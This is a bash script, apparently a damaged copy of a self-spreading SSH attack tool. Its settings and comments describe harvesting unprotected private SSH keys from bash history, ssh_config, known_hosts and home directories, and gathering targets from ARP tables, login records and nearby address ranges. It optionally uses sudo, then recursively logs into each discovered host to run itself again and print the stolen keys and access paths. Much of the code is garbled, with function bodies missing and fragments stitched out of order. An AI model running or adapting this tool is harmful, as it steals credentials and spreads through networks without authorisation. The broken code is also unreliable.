# GPL 3 License. See LICENSE and COPYING for more.
#
exportTHIS_SCRIPT=$(cat <<"MAIN_SCRIPT"# DO NOT EDIT THIS LINE
######
######
# SETTINGS
######
######
######
######
# General Settings
######
######
ignore_user=0# [0|1]: Consider a dest already scanned based only on the ip address. If user1@host is accessed, further access to user2@host will not re-run scans. This may be useful in an environment where sudo is accessible by every user (because user1@host can already access the keys that user2@host can access).
use_sudo=1# [1|0]: Attempt to use sudo on the dest. This may generate a large amount of security-related logs and can be extremely noisy.
ssh_timeout=3# [3|n]: The connection timeout for ssh. See ssh_config(5)'s ConnectTimeout.
retry_count=3# [3|n]: In some cases, a recoverable error in ssh may be encountered (such as trying to access an an AWS instance with a disabled username). This number corresponds to the maximum amount of times the destination is tried again. It's generally advised to set this to at least 1.
ignored_users=()# ("ubuntu" "root"): A list of usernames that are always ignored. If we do somehow end up on a server with this username, we will print where we are but not scan the destination.
ignored_hosts=()# ("8.8.8.8" "example.com"): A list of hosts that are always ignored. If we do somehow end up on a server with this host, we will print where we are but not scan the destination. Best if it's an ip address.
ignored_dests=()# ("root@10.2.3.4" "user@host.com"): A list of destinations that are always ignored. If we do somehow end up on a server with this destination address, we will print where we are but not scan the destination.
ignored_key_files=("*badcert.pem*""*badkey.pem*")# ("*badkey*" "*testkey*" "/etc/ssh/*" "/root/*/keys"): A list of locations that are ignored when searching for ssh keys. This setting supports globbing/wildcards using the standard asterisk as in any other bash script. Note that for example, "/dir/*/file" will also match "/dir/dir2/dir3/file".
custom_cmds=()# (): A list of commands that should be run after the script has been initialized and recursion has been checked. This means the commands will only be run ONCE when a destination is discovered for the first time. This list also supports sudo (if available), and can be used by using ${s} as a literal. For example, custom_cmds=('${s} ls /root')
######
######
# Private Key Discovery Settings
######
######
scan_paths=()# ("/home/*/" "/root/"): A list containing files or directories which should be searched for SSH private keys. Note that discovery of private keys is an intensive procedure, and scanning paths with many possible private key files can be slow. This setting supports globbing/wildcards using the standard asterisk as in any other bash script. For example, scan_paths=("/etc/*/keys" "/tmp/").
scan_paths_depth=3# [3|n]: If using scan_paths, specify the max-depth. Set to 99999 or some high number to have no restriction.
use_find_arp_neighbours=1# [1|0]: arp neighbours may be interesting hosts.
use_find_d_block=0# [0|1]: If we are connected to, for example, 10.1.2.3, it may be interesting to attempt to connect to 10.1.2.0-10.1.2.3.255, therefore we add these to a list of potential hosts.
######
######
# Destination (user@host) Discovery Settings
######
######
use_find_from_authorized_keys=1# [1|0]: authorized_keys files may contain a directive to only allow SSH from certain hosts. These are interesting, so try them.
use_find_from_last=1# [1|0]: Check the last logins to this destination and attempt to ssh back to any addresses that have connected here before
use_find_from_prev_dest=1# [1|0]: When a destination has been ssh'd into, attempt to SSH (with any keys found) back to the destination that we connected from.
use_find_from_known_hosts=1# [1|0]: known_hosts files may contain hosts which have previously been SSH'd into.
use_find_from_hashed_known_hosts=0# [0|1]: known_hosts files may contain hosts which have previously been SSH'd into. However, ssh's HashKnownHosts option hashes the host files. We can try to brute force, which we do by brute-forcing the c and d blocks of the current destination's ip add>
# It may be interesting to attempt to ssh into all of the destinations that have previously been ssh'd into by previously scanned destinations.
# Although we can't find a direct link using one of the strategies on the destination from destinations A->C doesn't mean the key won't be accepted (where B->C has already been found).
# Therefore, there are a few strategies for discovering these links.
# There are four possible values for this setting:
#
# 0: Nothing.
# 1: Attempt to ssh into any destinations that up until the beginning of this script running, have been successfully connected to (by PREVIOUS destinations). For example: A->B->C. C will attempt to connect to B and A, B will attempt to connect to A.
# 2: In addition to #1, also attempt to ssh into any destinations that are indirectly connected to this destination in the the future. For example: A->B->C. As above, but A will also attempt to connect to C.
use_find_from_ignore_list=0# [0|2]
# use_find_from_ignore_list is slightly flawed. Consider the following:
# A->B->C ; Normal scan
# A->D->C ; A->D discovered naturally, D->C discovered using use_find_from_ignore_list=1 or use_find_from_ignore_list=2.
# A->C ; A->C discovered using use_find_from_ignore_list=2.
# In this case, the link from C->D will not be discovered because destination D was first discovered after destination C has already been scanned.
# Since C has already been scanned, it won't be scanned again, thus losing the valuable data of C->D.
#
# Therefore, we have a completely different strategy.
# Once the scan is completely finished (i.e. the inital script that a human runs), the whole scan completely re-runs with each of the previously discovered destinations added to interesting_dests().
# Effectively, this means that every destination will be scanned by every other destination. at least once.
# On the re-run, we do NOT attempt to discover any NEW users/hosts/dests, only discover keys. This means that although new chains may be discovered, no new destinations will be discovered.
# Note: it is also possible that new destinations will be discovered with this method, due to some strange network routing, however this is not intentional. (see XXX: Should we report that this is a NEW destination?)
use_retry_all_dests=1# [0|1]
######
######
# Destination AND Private Key Discovery Settings
######
######
use_find_from_bash_history=1# [1|0]: bash_history files may contain calls to ssh, scp or rsync, which may contain clues for users, hosts, dests, and private key locations. This is one of the best discovery techniques to leave enabled.
use_find_from_ssh_config=1# [1|0]: ssh_config files may contain usernames, hosts, and private key locations.
######
######
# Combinatorial Destination Discovery Settings
######
######
interesting_users=("$USER""root")# ("$USER" "root"): A list of usernames which are always tried for every host that has been found if use_combinate_interesting_users_hosts=1.
interesting_hosts=("127.0.0.1")# ("127.0.0.1"): A list of hosts which which are always tried for every user that has been found if use_combinate_interesting_users_hosts=1.
interesting_dests=()# ("root@10.1.1.1"): A list of destinations which are always tried if use_combinate_interesting_users_hosts=1.
use_combinate_interesting_users_hosts=1# [1|0]: Combine all interesting users with all hosts to create destinations. Combine all interesting hosts with all users to create destination. Combine all interesting users with all interesting hosts to create destinations.
use_combinate_users_hosts_aggressive=0# [0|1]: Combine all found usernames with all found hosts into attempted destinations. This may result in massive growth of attempted destinations (100 usernames discovered with 100 hostnames will result in 10,000 attempted destinations).
#########
#########
######### Do not edit anything beyond this point unless you know what you're doing!
declare -A root_ssh_keys # Used only to keep track of the number of keys discovered.
declare -A root_ssh_hostnames_dests # Used only to keep track of the number of servers accessed. Format is the same as hostnames_chain: user@(host1:host2).
declare -A root_ssh_hosts_dests # Also used to keep track of the number of servers accessed. Format is the same as hosts_chain: user@host.
# Function to convert all final ssh destinations from root_ssh_hostnames_dests from the format user@(host1:host2:...) (aka hostnames_chain format) into user@host user@host2 ...
# Prints all user@host combinations, including those from root_ssh_hosts_dests (aka hosts_chain format)
# This is only used if use_retry_all_dests is set to 1.
gen_retried_interesting_dests(){
local ssh_dest
# ssh_dest format is user@(host1:host2)
# Output of this is \x22user@host1\x22\n\x22user@host2\x22
for ssh_dest in "${!root_ssh_hostnames_dests[@]}";do
printf"%s""$ssh_dest"| awk -F'[@():]' -v OFS='@''
{
user=$1
for(i= 2; i <= NF; i++){
if($i !=""&& user !=""){
print "\\x22" user "@"$i"\\x22"
}
}
}'
done
for ssh_dest in "${!root_ssh_hosts_dests[@]}";do
printf"\\\x22%s\\\x22\n""$ssh_dest"
done
}
# If the script is run for the first time (or: the script has not been executed with the script's contents as the first argument) it executes itself.
# It also removes any comments, unnecessary white-spaces, and unused functions from the script (including this one!), to save space for arguments.
remove_function+="find_from_hosts find_arp_neighbours find_d_block "# These functions only find hosts, and since we have no interesting_users, we're never going to combinate them using combinate_interesting_users_hosts. XXX: Should we warn the user?
fi
if[[$use_find_from_authorized_keys -eq 0&&$use_find_from_known_hosts -eq 0&&$use_find_from_hashed_known_hosts -eq 0]];then# find_user_from_file is only used in these three functions.
remove_function+="use_combinate_interesting_users_hosts combinate_interesting_users_hosts "# use_combinate_users_hosts_aggressive is a superset of combinate_interesting_users_hosts.
local_script="$(printf"%s""$local_script"| sed '/^interesting_dests=(/c\interesting_dests=('"$retried_interesting_dests"')')"
local_script="$(printf"%s""$local_script"| sed 's/^use_retry_all_dests=1/use_retry_all_dests=2/')"
# We do not want to find any new dests and so on, so remove all of the non-key functions.
# If you REALLY want to look for new users/hosts/dests using use_combinate_users_hosts_aggressive or combinate_interesting_users_hosts(interesting_users/interesting_hosts), then replace the following line with remove_function="retry_all_dests".
required_commands=("ssh-keygen""readlink""ssh""basename""base64""awk""sort""grep""tr""find""cat""stdbuf")# "sudo" "hostname" "xargs" "getent" "ifconfig" "ipconfig" "ip" "timeout" "dscacheutil" are all semi-optional. "sed" is necessary only by the first system.
# Determining the ip address of the current destination is difficult because it may have multiple ip addresses, and we are likely to connect to both of them eventually (including 127.0.0.1 for example).
# This means that we effectively have multiple hosts despite it being the same destination, meaning pathways may be left mangled (A->B->C exists, and A->C exists too but with a different ip address).
# Therefore, we take two strategies for finding and printing the addresses of the destination.
#
# Firstly, define the current destination's address as the concatenation of all of its ipv4 addresses: IP_1:IP_2:IP_3. The output of that will be:
# This output isn't particuarly useful for using to actually connect to hosts using the data, but it is useful for creating graphs (because each destination will correspond to a collection of ip addresses).
# This format of ip address is also useful for the script to determine whether a destination has already been scanned or not (aka whether the destination are in the ignore_list).
# Therefore, we split all ips for this host and add a separator ":", which we use for the ignore_list as well.
#
# Secondly, we determine the destination's address which the script actually used to connect to this server:
# This output is useful to see what the script actually did, and can therefore be used to recreate the ssh command needed to get from server A to server B.
# Initalize the hostnames_chain. This chain is not the exact pathway in the network sense, but rather the pathway of unique servers (independent of the ip address we used to access them).
# For example, user@(host)[key]->user@(host:host:host:host)
# Determine whether the current server has already been scanned.
# If it has already been scanned (or is in the process of being scanned), finish.
# Otherwise, add the current destination to the ignore list (even though it has not been scanned yet, but to avoid further destinations scanned from this one going in a circle).
# If ignore_user is set, we check whether the current _host_ (not destination) alone has been scanned.
# Also fill the ignore_list_array array with a list of all the demangled dests from ignore_list.
check_for_recursion(){
[[$ignore_user -eq 1]]&&[["$ignore_list"== *"@$current_hostnames_ip$ignore_separator"* ]]&& fin
[["$ignore_list"== *"$ignore_separator$user@$current_hostnames_ip$ignore_separator"* ]]&& fin
# In general, if a destination has more than one ip address, the script doesn't really care about the individual addresses for the sake of checking for recursion.
# However, individual addresses are useful for discovery of dests (from ignore_list_array for example from find_from_ignore_list).
# Therefore, if $user@$this_host is not present in the demangled list of dests, add it. That is to say, if we've connected to this destination by user@this_host, and this_host is somehow not present on this server, add it.
# This will also be printed when we fin(), via $current_hosts_ip.
# XXX: Is this smart to do? Probably not: disabled until further notice.
# Sets up and initializes internal variables and options.
setup(){
check_startup
check_sudo
check_sshkeygen
check_ssh_options
init_current_ips
init_chains
init_indent
# Print the normal hosts_chain.
chained_print ""
# Print the hostnames_chain.
printf"%s%s\n""$indent""$hostnames_chain"
init_ignored # We deal with any ignores users, hosts, and dests after printing the destination information because we want to know how we got here, but we don't want to scan.
check_for_recursion # We check for recursion after printing where we are because we only want to avoid scanning the destination if it's already been fully scanned. We still want to list how we got here.
}
# If we're using use_retry_all_dests, we don't want to scan for any users/hosts/dests on any dests that we have already scanned, we just want to find keys on those destinations.
# Therefore, if using use_retry_all_dests, no-op the addition of hosts/dests/users.
# Then, manually add all interesting_dests values into ssh_dests.
# Since interesting_dests is filled with the demangled destinations (effectively a demangled ignore_list), we check whether each of this destination's $user@$ip is in interesting_dests.
# If all of this destination's $user@$ips are in interesting_dests, we assume we are 'revisiting' this server, so do not perform scanning for users/hosts/dests.
retry_all_dests(){
local current_ip
local ssh_dest
[[$use_retry_all_dests -eq 2]]||return
for current_ip in "${!current_ips[@]}";do
if[["${interesting_dests[*]}" != *"$user@$current_ip"* ]];then# TODO: remove this loop? turn it into exit?
return# XXX: Should we report that this is a NEW destination?
# Given the location of a potential ssh private key, determine whether we can use the private key for ssh. If so, populate the priv_keys array which contains keys that we will ssh with.
#
# First we attempt to generate a public key for the file using ssh-keygen -yf with an invalid password. If the private key does not have a password, the invalid password does not affect the public-key generation. If the private key does have a passphrase, an error occurs.
# On old ssh-keygen versions, using ssh-keygen -yf on files with too-permissive permissions (regardless of (whether it has a passphrase or not) forces a prompt. By specifying a passphase, this prompt is avoided.
# Therefore, if ssh-keygen -yf fails, we are dealing with any of: 1) a file which is not a private key, 2) a file with invalid permissions, or 3) a private key with a passphrase (or a combination thereof).
# If ssh-keygen -yf's stderr includes "invalid format", the file is not a private key.
#
# If ssh-keygen -yf succeeds, we are dealing with a file which is an unprotected private key file.
#
# There are quite a lot of different failure cases which may be considered, such as (possibly not exhaustive):
# Permission issues on [keyfile], missing [keyfile].pub files (for old versions of ssh-keygen), missing [keyfile].pub files for PEM formatted keys, all protected keys with missing [keyfile].pub (for old ssh-keygen), permission issues on [keyfile] while missing [keyfile].pub and using an extremely old version of ssh-keygen.
# [keyfile] could also not be a valid key at all.
#
# It's all a big mess, which is probably impossible to solve with ssh-keygen itself.
# Therefore, we don't mess around with it and simply use the pubkey as the key for the array of private keys, and the value is the location of the key.
# Also print the key's contents.
populate_keys(){
local ssh_pubkey
local ssh_pubkey_ret
local key_file
key_file="$1"
# ssh-keygen -yf attempts to calculate the public key from the private key.
# Even if there is no passphrase, use -P because old versions of ssh-keygen start an interactive prompt if there are permission errors.
key_file="$(${s} readlink -m -- "$unresolved_key_file" 2>/dev/null)"# use sudo because it may be a symlink in a priviliged location, not that it would really matter (ssh will just use the symlink)
# Given a key file path and a home directory, determine whether the key exists and corresponds to a private key or not using the appropriate home directory location where necessary.
# This converts ~/ and relative paths to their appropriate locations based on the home_folder location.
check_potential_key_files(){
local key_file
local home_folder
local potential_key_file
key_file="$1"
home_folder="$2"
for potential_key_file in "$key_file""$home_folder/${key_file:1}""$home_folder/$key_file";do
# Attempts to find users, hosts, destinations, and private keys from bash history files.
# Due to the multitude of arguments that ssh may take, we parse each bash_history file and then tokenize the line.
# In reality, we look for any calls to ssh, scp, and rsync, and parse the tokens appropriately. This is extremely difficult as we're emulating execve's job with unreliable, arbitrary data.
#
# In all cases, we attempt to parse the standard user@host.
#
# In the case of scp and ssh:
#
# We discover private keys by matching the "-i" flag in the form of "-i file" or "-ifile".
# The -i flag is used in various ways: -i /home/user/.ssh/id_rsa, -i ~/.ssh/id_rsa, or -i .ssh/id_rsa.
# In the first case, we can simply check whether the key exists and is a key, and populate our list of keys: check_and_populate_keys /home/user/.ssh/id_rsa.
# In the second case, we replace the ~ character with the home directory for which we are parsing the bash_history file: check_and_populate_keys $home_directory/.ssh/id_rsa.
# In the last case, we prepend the home directory for which we are parsing the bash_history file: check_and_populate_keys $home_directory/.ssh/id_rsa.
#
# In the case of ssh:
#
# The -l flag can be used to specify the username of the remote destination. For example, ssh host -l root, or ssh host -lroot.
# We parse both cases, and add them to ssh_users. For the life-time of the bash history LINE, we also save the username.
#
# In the case of both scp and ssh, we are generally parsing lines which may or may not include usernames, hosts, destinations, keys, arguments, and commands to run on the remote server.
# This complicates things slightly, as the following:
# ssh -v -i .ssh/id_rsa -l user host 'ps auxf'
# needs to be parsed very carefully.
# We also need to ensure we don't parse too much of the line to include commands that are passed to the ssh session (e.g. ssh -luser host 'ps')
# Therefore, for each line that is parsed, we also cache the username and host that is parsed (if possible). If a username and host are parsed, we stop processing the line (unless the `-i` flag is detected but the key has not been retrieved yet).
# If no username is parsed for the whole line, we guess the username is that of the user whose home directory we are looking at.
# Shouldn't be necessary, but can get rid of trailing commands, complicated cases (sigh).
break
fi
fi
done
[[ -z "$cached_ssh_user"]]&& add_ssh_user "$home_user"&&cached_ssh_user="$home_user"# XXX: Can we parse ssh_config and detect Host [host] corresponds to a user, instead?
# Attempt to find usernames, hosts, and key files from ssh_config files.
# An example of an ssh_config file:
# Host example.com
# Hostname example.com
# User your_username
# IdentityFile ~/.ssh/id_rsa
#
# We parse both Host and Hostname (since Hostname is optional).
# We also deal with IdentityFile when it begins with a ~ or a relative path.
#
# Unfortunately, we don't create ssh_dests based on the results because we parse the file line-by-line. We could probably make this work properly if we reset the variable when there's an empty line.
# Find any hosts that have previously ssh'd into this dest. Guess that the username they're sshing to here is the same as where they're coming from (naively).
find_from_hashed_known_hosts # Should always be last as it relies on ssh_hosts being filled.
}
# If use_combinate_users_hosts_aggressive is enabled, combinate all:
# ssh_hosts and interesting_hosts
# ssh_users and interesting_users
#
# Then, join all ssh_users@ssh_hosts.
combinate_users_hosts_aggressive(){
local ssh_user
local ssh_host
for ssh_host in "${interesting_hosts[@]}";do
add_ssh_host "$ssh_host"
done
for ssh_user in "${interesting_users[@]}";do
add_ssh_user "$ssh_user"
done
for ssh_dest in "${interesting_dests[@]}";do
add_ssh_dest "$ssh_dest"
done
for ssh_host in "${!ssh_hosts[@]}";do
for ssh_user in "${!ssh_users[@]}";do
add_ssh_dest "$ssh_user@$ssh_host"
done
done
}
# Add any interesting dests, combine any interesting users with all hosts, any interesting hosts with all users, and interesting hosts with interesting users.
combinate_interesting_users_hosts(){
local ssh_user
local ssh_host
for ssh_dest in "${interesting_dests[@]}";do
add_ssh_dest "$ssh_dest"
done
for ssh_user in "${interesting_users[@]}";do
add_ssh_user "$ssh_user"
for ssh_host in "${!ssh_hosts[@]}";do
add_ssh_dest "$ssh_user@$ssh_host"
done
done
for ssh_host in "${interesting_hosts[@]}";do
add_ssh_host "$ssh_host"
for ssh_user in "${!ssh_users[@]}";do
add_ssh_dest "$ssh_user@$ssh_host"
done
done
for ssh_host in "${interesting_hosts[@]}";do
for ssh_user in "${interesting_users[@]}";do
add_ssh_dest "$ssh_user@$ssh_host"
done
done
}
# Deduplicate ssh_dests by resolving the hosts for each ssh_dest, checking whether the user, host, or resolved dest is ignored, then adding the destinations back to the original ssh_dests array.
# Checks whether a string is a candidate for an ssh dest.
is_ssh_dest(){
local ssh_user
local ssh_host
local ssh_dest
ssh_dest="$1"
[[ -z "$ssh_dest"]]&&return1
# XXX: The below line is intrinsically flawed because even if $ssh_dest is already in ssh_dests, this does not mean $ssh_host has not been added to $_ignored_hosts. We keep it here to remember not to add it again.
# If set to 1, we will stop trying any new keys for this dest (aka we break).
skip_this_dest=0
# Record the amount of lines for each ssh attempt.
line_num=0
# Loop through each line of the SSH output one-by-one.
whileIFS=read -r line;do
((line_num++))
# If there is a connection error a dest, don't bother trying other keys (or other users) for the other users of the same host.
#
# ssh: Could not resolve hostname server: Name or service not known ; should never happen since we use ip addresses, but pick it up anyways.
# ssh: connect to host ip port 22: Connection refused
# ssh: connect to host ip port 22: Connection timed out
# ssh: connect to ip port 22: No route to ip
# ssh: connect to host ip port 22: Network is unreachable
# ssh: connect to host port 22: No route to host
# ssh: connect to host ip port 22: Operation timed out
if[["$line"== *"resolve hostname"* ||"$line"== *"connect to "* ]];then
_ignored_hosts["$ssh_host"]=1
skip_this_dest=1
break
fi
# bash argument list too long; we can't continue, so print where we are, the maximum argument length (because why not), and the ignore_list (which is the non-static part of the script which is causing the argument list too long).
# It may be useful to take the ignore_list and set those ip destinations as ignored_dests.
# This is an unrecoverable error, so kill everything.
if[["$line"=="INTERNAL_MSG: ARG_LIMIT"]];then
printf"INTERNAL_MSG: ARG_LIMIT\n"
fin
fi
# Various warnings may occur when using ssh, bash, or other programs. In general, we can simply ignore these messages as they're warnings, not errors, and we have no use for them at all.
#
# Warning: Permanently added '...' (RSA) to the list of known hosts.
# Permission denied (publickey,password).
# grep: [file]: Permission denied
# identity_sign: private key [file] contents do not match public
# A destination has finished scanning and we add it to the ignore list. We also propagate it.
# When a destination is finished scanning, it gets added to the ignore_list in all intermediate destinations.
# However, remember, that for: A->B->C, the ignore_list on destination "B" will initially be longer than the ignore_list of "A". This is because while we add ourself(server) to the ignore_list when starting, we don't propagate it until we have finished.
continue# Don't break, as it may be being passed through from a much higher destination.
fi
# If a destination has been scanned but fails a check to ensure all the programs that this script needs are present, report that the destination can be SSH'd to, and the function that is missing.
if[["$line"=="INTERNAL_MSG: command not found: "* ]];then
# If a destination has no memory, it is likely to crash while running this script using awk, or some other program. Catch it and report that it is out of memory.
# SSH may sporadically fail due to connection issues in various ways. Looking at the source for openssh and using all of the servers that reported errors, I've determined that the following errors may occur when a connection to a server is broken one way or another.
# When any of these errors occur naturally, we retry the destination (and the key which is associated with this destination).
#
# Write failed: Broken pipe
# Timeout, server [host] not responding
# Connection to host closed by remote host
# Read from remote host [host]: [error]
# Connection closed by [host] XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18
# Connection closed by [host] port 22 XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18
# ssh_exchange_identification: read: Connection reset by peer
# Connection from/to ip [host] timed out
# Disconnected from [host]
# Connection reset by [host]/peer, kex_exchange_identification: read: Connection reset by peer
# Connection to [host] closed by remote host. XXX: This may mean it's vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18
# Connection to [host] timed out while waiting to read
# kex_exchange_identification: Connection closed by remote host
# ssh_exchange_identification: Connection closed by remote host
# If we receive one of these errors within the first three lines of the connection being made, it most likely means there is something fatally wrong with the server.
# This could be a server vulnerable to https://joshua.hu/ssh-username-enumeration-ubuntu-18, or some other error where the connection was never established in the first place, and is never going to be.
# If the error message is not that of a possibly vulnerable server, then add the host to _ignored_hosts.
# If the line contains the chain, then it means the line has also been "dealt with" (i.e. it is an expected output) from the remote destination. For example: [00000] user@host[key]->user@host2[key2]->user@host3: something.
# Since it contains "user@host[key]->user@host2[key2]->user@host3", that means the remote destination printed it from the script.
# So, just pass it down to other destinations down the chain.
if[["$line"== *"$t_hosts_chain"* ||"$line"== *"$t_hostnames_chain"* ]];then# Includes a chain, so just print it.
printf"%s\n""$line"
else
# If the line doesn't contain the chain, then it's an unexpected output. So, print the chain including the destination, and the line.
rs_chained_print "$t_hosts_chain""$ssh_dest [line]: $line"# Doesn't include a chain, so the message is coming from something we didn't expect, so print it with [line].
# priv_keys maybe empty, add_ssh_dest could be newly ignored.
printf"%s%s: EXTERNAL_MSG: INFO: Trying again with %d dests and %s keys (attempts left: %d)\n""$indent""$hosts_chain""${#ssh_dests[@]}""${#priv_keys[@]}""$retry_count"
recursive_scan
}
setup
exec_custom_cmds
find_all
combinate_users_hosts_aggressive
combinate_interesting_users_hosts
deduplicate_resolved_hosts_keys
((${#ssh_dests[@]}))|| fin
((${#priv_keys[@]}))|| fin
printf"%s%s: EXTERNAL_MSG: INFO: Beginning with %d dests and %d keys\n""$indent""$hosts_chain""${#ssh_dests[@]}""${#priv_keys[@]}"